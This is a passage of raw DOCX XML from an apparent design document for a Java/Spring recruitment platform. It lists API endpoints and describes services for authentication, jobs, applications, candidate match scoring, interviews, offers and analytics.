              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns unread notifications for current user (application updates, interview invites, offers).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/notifications/{id}/read</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / { message }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Marks notification as read.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: ResumeController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/resumes | Primary Domain: Resume Upload &amp; Parser Dispatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ResumeParserService, CandidateProfileService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/resumes/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MultipartFile file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / ResumeParsedDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Accepts PDF/DOCX resume (up to 20MB), validates MIME type via Apache Tika, extracts text, identifies skills, and updates profile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Exhaustive Inspection of All 11 Domain Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: AuthService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Handles user registration, authentication verification, password hashing, and role mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>UserRepository, RoleRepository, PasswordEncoder (BCrypt), JwtUtil, AuthenticationManager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. signup(): Validates unique constraints; encodes raw password with BCrypt; loads Role entity from DB; instantiates User; triggers CandidateProfile initialization if role is CANDIDATE.</w:t>
        <w:br/>
        <w:t>2. login(): Executes authenticationManager.authenticate(new UsernamePasswordAuthenticationToken(user, pass)); on success, fetches UserDetails and generates signed JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: JobService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Manages job requisition lifecycle, full-text catalog filtering, and company associations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobRepository, CompanyRepository, CategoryRepository, SkillRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. getJobs(): Derives JPA query with specification predicates (keyword search in title/description, location match, work mode enum); uses JOIN FETCH to prevent N+1 queries.</w:t>
        <w:br/>
        <w:t>2. createJob(): Validates salaryMin &lt;= salaryMax; maps recruiter entity; associates skills; saves Job entity with status OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: ApplicationService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Controls applicant state machine, idempotency checks, and recruiter status transitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationRepository, JobRepository, UserRepository, NotificationService, AuditLogService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. applyForJob(): Decorated with @Transactional. Checks applicationRepo.existsByJobAndCandidate; if true, throws DuplicateApplicationException; inserts Application in APPLIED state; dispatches notification.</w:t>
        <w:br/>
        <w:t>2. updateStatus(): Enforces valid state machine transitions (e.g., cannot move from REJECTED to HIRED without re-screening); updates application status; writes immutable AuditLog entry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: CandidateProfileService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Manages candidate resume metadata, skill tagging, and computes match scores.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>CandidateProfileRepository, SkillRepository, JobRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. calculateMatch(): Retrieves candidate verified skills and job required skills; normalizes string casing; performs HashSet intersection in O(N+M); weights skill factor (50%), experience factor (25%), and location factor (25%); returns MatchScoreBreakdownDto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: AdminService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Provides platform telemetry aggregation, user moderation, and governance reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>UserRepository, JobRepository, ApplicationRepository, OfferRepository, AuditLogRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. getPlatformStats(): Aggregates counts using database COUNT(*) queries; computes offer acceptance ratio.</w:t>
        <w:br/>
        <w:t>2. toggleUserStatus(): Inverts User.enabled flag; invalidates user login capability; logs moderation event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: InterviewService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Coordinates technical interview scheduling, candidate notification, and meeting URLs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>InterviewRepository, ApplicationRepository, NotificationService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. scheduleInterview(): Instantiates Interview entity with round type (Technical, HR, System Design); validates scheduledAt is in the future; updates application status to INTERVIEW_SCHEDULED; dispatches calendar invite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: OfferService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Handles formal offer creation, salary terms, and candidate response orchestration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>OfferRepository, ApplicationRepository, NotificationService, AuditLogService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. createOffer(): Validates candidate is in SELECTED stage; creates Offer record with joining date and compensation; transitions application to OFFER_SENT.</w:t>
        <w:br/>
        <w:t>2. respondToOffer(): If ACCEPTED, transitions application to HIRED; if DECLINED, marks application as OFFER_DECLINED; notifies hiring recruiter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: AnalyticsService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Computes recruitment conversion metrics, pipeline velocities, and KPI telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationRepository, JobRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. getRecruiterAnalytics(): Calculates stage-by-stage drop-off percentages; computes average time candidates spend in SCREENING vs INTERVIEW stages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
